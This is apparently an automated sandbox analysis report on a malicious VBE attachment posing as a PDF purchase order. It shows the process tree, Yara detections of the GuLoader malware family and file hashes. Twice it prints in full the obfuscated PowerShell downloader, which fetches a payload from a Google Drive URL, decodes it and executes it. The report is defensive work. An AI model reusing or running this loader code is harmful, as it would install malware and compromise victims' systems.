                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                        Accept-Ranges: bytes
                        Content-Length: 106560
                        Last-Modified: Mon, 30 Sep 2024 07:11:44 GMT
                        X-GUploader-UploadID: AD-8ljumxkouoh8aPbuPtjaerRrS2jzpm4cjGOdMj93XJt8nJe8YooWcg1-BRdU56N7LnVOYyRAHLuUbOw
                        Date: Tue, 01 Oct 2024 05:47:00 GMT
                        Expires: Tue, 01 Oct 2024 05:47:00 GMT
                        Cache-Control: private, max-age=0
                        X-Goog-Hash: crc32c=6yan6A==
                        Server: UploadServer
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close


                        Target ID:0
                        Start time:01:46:18
                        Start date:01/10/2024
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe"
                        Imagebase:0x7ff70bf60000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:01:46:21
                        Start date:01/10/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. 
DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfruhindes ' ipho$Hastvg T erLSkrfeoReemeBA oriaPolyml Hand: aarbmFl voiBaadelGladliIndfaeOppusU MoersMillikligniAUnmitd KamfE .elelprisbIBudgegT ryhtPocan=ComfinR sereSlibeW Blot-Tilryo ,orrb Ro ojJa.tfEMeso cDentitClavi Ukldes Vejty SkadsSlagiT ftjeE Van MProgr. 
ncolnGudsbEStikktOsten.p stpwCroupEDistrbExcu CTa,nilTaxieI FrilE orhaNSk altSweet ');Electroendosmosis ($Gaveled);Electroendosmosis (Jomfruhindes 'Panel$DyrekMRancoiC urclK,nfeiEssayeParatu int sUnderkOverbaTegledP skeeKongelOver.i SkrugBrekrtAdeno.Fr igH uniceHighba OrbidBe tie egrr enits Unca[Excom$GeophAVandsmBiosye apidrForfri bankkStenbaU pilnDevitiOb,ats birdmTerrne Tan n NicosFedt,] ccul= Da b$SecerDVend ig urmnMan.ddenkeleSkov rA ers ');$Slagsidens=Jomfruhindes ',epit$A.titM StudiWi djl iddiSterneCrep,uUnfris S ikk B,agaTrokidKrydse alaclSkrifi jagtgUd mpt S.el.J ggiDDupleoHelbrwVarefn Ov rlBioeloMisalaPa.amdPortuFUnduliblo blK onveLibet(Mygge$LoversCommuacholemOverblTremasjusten Filti yzonnTrykvgCossisIndsm, effi$EclecN Carao Muren Una lluftnemiskupS nktin tvrd lasto DrowpUni ktTextue nerkrSkudsaDimounPrvet)Tamir ';$Nonlepidopteran=$Allende;Electroendosmosis (Jomfruhindes 'Heave$Gleemg oloslA gloo TotabH deraUnmerLObduc:Dir eOJ mfrRSamdeITermig ProgIF oddN KoinaTenenLJa.niIQu.entEdeagiSurfieStrutSCongr=Unnat(DiscotKa,pheDiletSSkoldta,omf-Hy anp Va.aAFede,Tt rdih ell Imple$ha deN L ehoInfinN,ecallBubbie VipppHenreIe,figD DimiOokkulp SirbTSlgtsEekskoR ,eadaHomieNAgari)Sooth ');while (!$originalities) {Electroendosmosis (Jomfruhindes 'Bruge$Klinkg Za,rlAnthoo .seubStok a P lalSetn : DraaALivtavAntioistrygaStricto erpi RocknMandag Smoo=To zl$NoveltA rmar GrunuPopedeP lpe ') ;Electroendosmosis $Slagsidens;Electroendosmosis (Jomfruhindes 'RaffiSVerm,tKrydsaOphrerBrugstBolig- HabaSDistelSmkkyeFrifie GreypStaal Ch ys4Unyok ');Electroendosmosis (Jomfruhindes ' uadr$Untung KattlTyvetoToad,b ampa ennlFrank:grafiobioder unsuiIn exgOpraaiOverlnStadiaAnnitlOversi AlintSaddliU,phyeintersKnowe=Synkr( miniTDetleebemeasHarlet.enth- rankP .olaa Bloct titth,ebin Cohel$DistrN indfoSuggenknolll Ha eeIn enpMtniniFarerdFlugtoForbrpGdnintChikkeMaalerBilfrasurrenBorge)Tidal ') ;Electroendosmosis (Jomfruhindes 'St.nd$ BeatgHeparlL.stooStaphbSmileaKommulDomka:W nklN 
MycoeFdekdd.apperShalteRrt,svSkaldnPalaneGidse=Immun$Afslug imetlSvinsoNeds,bber na SlaglUnma : Pha M HomoiSkedecAfficr Ta soF,aadsUnreccKvgproSkinfp hoseiIndrecStr gs Neur+,vers+Konom%,erri$DroppTCc.slrBloopa SorgcglanstGermas eat.Xero cVagteo xtrauPraeanbraistEvent ') ;$samlsnings=$Tracts[$Nedrevne];}$Frastdtes=308914;$Tracheloclavicular=31475;Electroendosmosis (Jomfruhindes 'Trsko$forelgRagnelLoa aoBotelbMana,a AgonlGr.in: CornBBiopsuMulchrAma,ri,ugleeR,achr An isSnitm Opdat=Trans unki G Proce .nmetMilen-PukkeC .ofloBaandnB rigtascleeepoxynVejsytMim o Bibli$ EndoNArbejoTilstn,ebutlKi,skeGennepMortiiTownfdRasteorummepSelvmtAnsgneMeetirLaveraSku ln ook ');Electroendosmosis (Jomfruhindes ' Blom$ MonogSp ldlTrykaoW keybTr phaJonbylIsod.: lamU orpun nnelisl,nitRupica Gagercard i VikisHot lmUfoeneB cycsTutam Seig = weal Imb u[ SkruS Ke oy Samms,revvt PhaleSie.em Rush. ottlC .meto .iatnPhilav UbeteFir.erHyb itPulvi]Overk:Rejs :E hveFoverorFlyveo.ankkmKimonB JumbaHardwsZink eRadio6Pro.e4ElectSfredstSubver gtesi S ganUnwarg inal(Bor e$ RemaBLoc,lufelt rFremki SacceHorlarD duks mpev) Merc ');Electroendosmosis (Jomfruhindes 'Victr$Ve seg Dinol nthroBlussb Solda Lev l H ni: LocaMUnreqeshe paB ushtTriambStiftaReverlOverclVigan1Dik,e8Osage9 Upfl Pre e=Vanad dragn[IdentSbrnemy syksD bdetBeg,ie AiremMorda.BordeTterrieMa acxTermotNonde.MountEK ttenOtt,mcBy,enoLagerd,cripiUndernSimengEndoc]an st:il.um: HallAbltesSFryseC t anITrau.IStorf.TeateGDiwateStillt A arSNon nt G nrr ,krui TarnnVasocg Egal(J.ywa$ roliUCingunBiweei Kat.t Hylea ,ccir,rianiAfprvs IngmmLresteFinalsI.cor)Analy ');Electroendosmosis (Jomfruhindes 'Sovek$RastegPreimlHjlpeo,crubbPitcha AnthlAsser:SkoleYUnflua BelysH milmWickeaAgorakshurl=Teich$ Re nMDruesep.chya Nyctt Pa,sbB lafaNonpalSaintl N.ri1Plowm8Skili9 ,vis.WhatesSammeusemipbYar tsKillytChiror.urioiCowbonPhysigPansc(Thali$TankaFS gnar S alaTi fosG myttHjlandC,ecktKrybbeFremss Elig,sols $PerilT ModerFreakaKolpoc trafhrecureOverslRegeloR assc,ennel 
HgtnaEftervPremai Senicsynkou Grufl .gesah,ndlrArou )Normy ');Electroendosmosis $Yasmak;"
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2241948302.000002B4370DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:01:46:21
                        Start date:01/10/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:01:46:32
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. 
DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfruhindes ' ipho$Hastvg T erLSkrfeoReemeBA oriaPolyml Hand: aarbmFl voiBaadelGladliIndfaeOppusU MoersMillikligniAUnmitd KamfE .elelprisbIBudgegT ryhtPocan=ComfinR sereSlibeW Blot-Tilryo ,orrb Ro ojJa.tfEMeso cDentitClavi Ukldes Vejty SkadsSlagiT ftjeE Van MProgr. 
ncolnGudsbEStikktOsten.p stpwCroupEDistrbExcu CTa,nilTaxieI FrilE orhaNSk altSweet ');Electroendosmosis ($Gaveled);Electroendosmosis (Jomfruhindes 'Panel$DyrekMRancoiC urclK,nfeiEssayeParatu int sUnderkOverbaTegledP skeeKongelOver.i SkrugBrekrtAdeno.Fr igH uniceHighba OrbidBe tie egrr enits Unca[Excom$GeophAVandsmBiosye apidrForfri bankkStenbaU pilnDevitiOb,ats birdmTerrne Tan n NicosFedt,] ccul= Da b$SecerDVend ig urmnMan.ddenkeleSkov rA ers ');$Slagsidens=Jomfruhindes ',epit$A.titM StudiWi djl iddiSterneCrep,uUnfris S ikk B,agaTrokidKrydse alaclSkrifi jagtgUd mpt S.el.J ggiDDupleoHelbrwVarefn Ov rlBioeloMisalaPa.amdPortuFUnduliblo blK onveLibet(Mygge$LoversCommuacholemOverblTremasjusten Filti yzonnTrykvgCossisIndsm, effi$EclecN Carao Muren Una lluftnemiskupS nktin tvrd lasto DrowpUni ktTextue nerkrSkudsaDimounPrvet)Tamir ';$Nonlepidopteran=$Allende;Electroendosmosis (Jomfruhindes 'Heave$Gleemg oloslA gloo TotabH deraUnmerLObduc:Dir eOJ mfrRSamdeITermig ProgIF oddN KoinaTenenLJa.niIQu.entEdeagiSurfieStrutSCongr=Unnat(DiscotKa,pheDiletSSkoldta,omf-Hy anp Va.aAFede,Tt rdih ell Imple$ha deN L ehoInfinN,ecallBubbie VipppHenreIe,figD DimiOokkulp SirbTSlgtsEekskoR ,eadaHomieNAgari)Sooth ');while (!$originalities) {Electroendosmosis (Jomfruhindes 'Bruge$Klinkg Za,rlAnthoo .seubStok a P lalSetn : DraaALivtavAntioistrygaStricto erpi RocknMandag Smoo=To zl$NoveltA rmar GrunuPopedeP lpe ') ;Electroendosmosis $Slagsidens;Electroendosmosis (Jomfruhindes 'RaffiSVerm,tKrydsaOphrerBrugstBolig- HabaSDistelSmkkyeFrifie GreypStaal Ch ys4Unyok ');Electroendosmosis (Jomfruhindes ' uadr$Untung KattlTyvetoToad,b ampa ennlFrank:grafiobioder unsuiIn exgOpraaiOverlnStadiaAnnitlOversi AlintSaddliU,phyeintersKnowe=Synkr( miniTDetleebemeasHarlet.enth- rankP .olaa Bloct titth,ebin Cohel$DistrN indfoSuggenknolll Ha eeIn enpMtniniFarerdFlugtoForbrpGdnintChikkeMaalerBilfrasurrenBorge)Tidal ') ;Electroendosmosis (Jomfruhindes 'St.nd$ BeatgHeparlL.stooStaphbSmileaKommulDomka:W nklN 
MycoeFdekdd.apperShalteRrt,svSkaldnPalaneGidse=Immun$Afslug imetlSvinsoNeds,bber na SlaglUnma : Pha M HomoiSkedecAfficr Ta soF,aadsUnreccKvgproSkinfp hoseiIndrecStr gs Neur+,vers+Konom%,erri$DroppTCc.slrBloopa SorgcglanstGermas eat.Xero cVagteo xtrauPraeanbraistEvent ') ;$samlsnings=$Tracts[$Nedrevne];}$Frastdtes=308914;$Tracheloclavicular=31475;Electroendosmosis (Jomfruhindes 'Trsko$forelgRagnelLoa aoBotelbMana,a AgonlGr.in: CornBBiopsuMulchrAma,ri,ugleeR,achr An isSnitm Opdat=Trans unki G Proce .nmetMilen-PukkeC .ofloBaandnB rigtascleeepoxynVejsytMim o Bibli$ EndoNArbejoTilstn,ebutlKi,skeGennepMortiiTownfdRasteorummepSelvmtAnsgneMeetirLaveraSku ln ook ');Electroendosmosis (Jomfruhindes ' Blom$ MonogSp ldlTrykaoW keybTr phaJonbylIsod.: lamU orpun nnelisl,nitRupica Gagercard i VikisHot lmUfoeneB cycsTutam Seig = weal Imb u[ SkruS Ke oy Samms,revvt PhaleSie.em Rush. ottlC .meto .iatnPhilav UbeteFir.erHyb itPulvi]Overk:Rejs :E hveFoverorFlyveo.ankkmKimonB JumbaHardwsZink eRadio6Pro.e4ElectSfredstSubver gtesi S ganUnwarg inal(Bor e$ RemaBLoc,lufelt rFremki SacceHorlarD duks mpev) Merc ');Electroendosmosis (Jomfruhindes 'Victr$Ve seg Dinol nthroBlussb Solda Lev l H ni: LocaMUnreqeshe paB ushtTriambStiftaReverlOverclVigan1Dik,e8Osage9 Upfl Pre e=Vanad dragn[IdentSbrnemy syksD bdetBeg,ie AiremMorda.BordeTterrieMa acxTermotNonde.MountEK ttenOtt,mcBy,enoLagerd,cripiUndernSimengEndoc]an st:il.um: HallAbltesSFryseC t anITrau.IStorf.TeateGDiwateStillt A arSNon nt G nrr ,krui TarnnVasocg Egal(J.ywa$ roliUCingunBiweei Kat.t Hylea ,ccir,rianiAfprvs IngmmLresteFinalsI.cor)Analy ');Electroendosmosis (Jomfruhindes 'Sovek$RastegPreimlHjlpeo,crubbPitcha AnthlAsser:SkoleYUnflua BelysH milmWickeaAgorakshurl=Teich$ Re nMDruesep.chya Nyctt Pa,sbB lafaNonpalSaintl N.ri1Plowm8Skili9 ,vis.WhatesSammeusemipbYar tsKillytChiror.urioiCowbonPhysigPansc(Thali$TankaFS gnar S alaTi fosG myttHjlandC,ecktKrybbeFremss Elig,sols $PerilT ModerFreakaKolpoc trafhrecureOverslRegeloR assc,ennel 
HgtnaEftervPremai Senicsynkou Grufl .gesah,ndlrArou )Normy ');Electroendosmosis $Yasmak;"
                        Imagebase:0xec0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.3038628107.0000000008960000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.3026899970.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.3038911552.000000000B1AF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:01:46:32
                        Start date:01/10/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:9
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:10
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:11
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:12
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:13
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:14
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:15
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:16
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:17
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:18
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\syswow64\dxdiag.exe"
                        Imagebase:0xc60000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b5110a7a2dd5402936eaaae978152c708bf91aa6aa9e0a6384f1c109f592e701
                          • Instruction ID: ae6c60990a0cf654a6f6564b8b9bc6b52aa1c3b3f403ec2e20a68ceae5e5bc9e
                          • Opcode Fuzzy Hash: b5110a7a2dd5402936eaaae978152c708bf91aa6aa9e0a6384f1c109f592e701
                          • Instruction Fuzzy Hash: B722F331D0EBC25FE757AB3848556B47BA1EF66690F0901FEC088CB1D3EE19A849C356
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
